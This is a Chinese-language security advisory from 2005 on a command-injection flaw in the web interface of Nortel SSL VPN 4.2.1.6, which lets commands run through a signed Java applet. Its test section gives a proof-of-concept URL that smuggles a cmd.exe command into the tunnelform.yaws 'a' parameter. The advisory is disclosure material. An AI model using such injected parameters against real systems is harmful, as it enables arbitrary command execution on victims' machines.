发布日期：2005-12-12
更新日期：2005-12-12

受影响系统：

Nortel Networks SSL VPN 4.2.1.6

描述：

---

BUGTRAQ  ID: 15798

Nortel SSL VPN是远程访问安全解决方案，允许使用安全套接字层（SSL）做为基础安全协议。

Nortel的SSL VPN的WEB界面没有充分的验证用户输入，因此攻击者可以在某些页面的链接中隐藏命令。

由于从这些页面中所调用的Java Applet是经过加密签名的，因此可能以使用浏览器用户的权限执行任意系统命令。

<*来源：Daniel Fabian （d.fabian@sec-consult.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113443024722657&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+
c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&
0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...

建议：

---

厂商补丁：

Nortel Networks
---------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nortelnetworks.com/index.html

浏览次数：2592
严重程度：0（网友投票）